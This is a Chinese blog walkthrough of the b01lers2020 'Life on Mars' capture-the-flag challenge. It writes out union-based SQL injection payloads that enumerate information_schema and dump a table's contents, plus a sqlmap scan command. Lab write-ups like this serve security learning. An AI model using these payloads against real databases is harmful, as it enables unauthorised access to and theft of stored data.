当前位置:网站首页>[b01lers2020]Life on Mars
[b01lers2020]Life on Mars
2022-08-03 21:55:00 【茶经新读.】
[b01lers2020]Life on Mars

大体查看一下没啥重要的点,f12也没发现什么,抓包发现GET /query?search=&amazonis_planitia&{}&_=1659321817406,点击不同的标题,amazonis_planitia所在内容也会随着变化


尝试在本页面进入其所出现的页面
![]()

发现有很多数据,尝试一下联合查询:/query?search=amazonis_planitia union select 1,2,发现有回显

查一下库:/query?search=amazonis_planitia union select version(),database()

查表:/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'

查完之后发现回显的东西正是一开始的页面的各个标题,查询一下表的字段:/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia',也没什么特别的地方
使用sqlmap工具扫描一下
sqlmap下载:sqlmap: automatic SQL injection and database takeover tool
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs

发现改网页有三个数据库,自己查询一下:/query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA,确实有三个数据库

刚才已经查询过aliens了并没有发现什么,继续查询一下alien_code的表:/query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='alien_code'

查询code表的字段:/query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

查询一下内容:/query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code

至此完结,撒花
边栏推荐
猜你喜欢

YOLO之父宣布退出CV界,坦言无法忽视自己工作带来的负面影响

如何基于WPF写一款数据库文档管理工具(二)

6. XML

解决npm -v查看npm版本出现npm WARN config global `--global`, `--local` are deprecated. Use `--location报错

DO280管理和监控OpenShift平台--资源限制

线程池的高级应用技巧核心解读

XSS online shooting range---Warmups

用于流动质押和收益生成的 Web3 基础设施

XSS practice - cycle and two cycle problem at a time

测试2年6.5K,每天“911”,我的心酸经历只有我自己知道···
随机推荐
ValidationError: Progress Plugin Invalid Options
东西向和南北向通信的统一
XSS online shooting range---Warmups
HCIP第十三天
D - Project Planning--二分
[kali-vulnerability scanning] (2.1) Nessus download and installation (on)
Unification of east-west and north-south communications
什么密码,永远无法被黑客攻破?
21天打卡挑战学习MySQL——《Window下安装MySql》第一周 第三篇
关于GPIO你真的懂了吗?这篇文章都给你整理好了
老板:公司系统太多,能不能实现账号互通?
从0到1看支付
易基因|RNA m5C甲基化测序(RNA-BS)技术介绍
线程池的高级应用技巧核心解读
L2-041 插松枝
XSS online shooting range---haozi
Android build error: Plugin with id 'kotlin-android' not found.
466. Count The Repetitions
CAS:1620523-64-9_Azide-SS-biotin_biotin-disulfide-azide
CAS:908007-17-0_Biotin-azide _生物素叠氮化物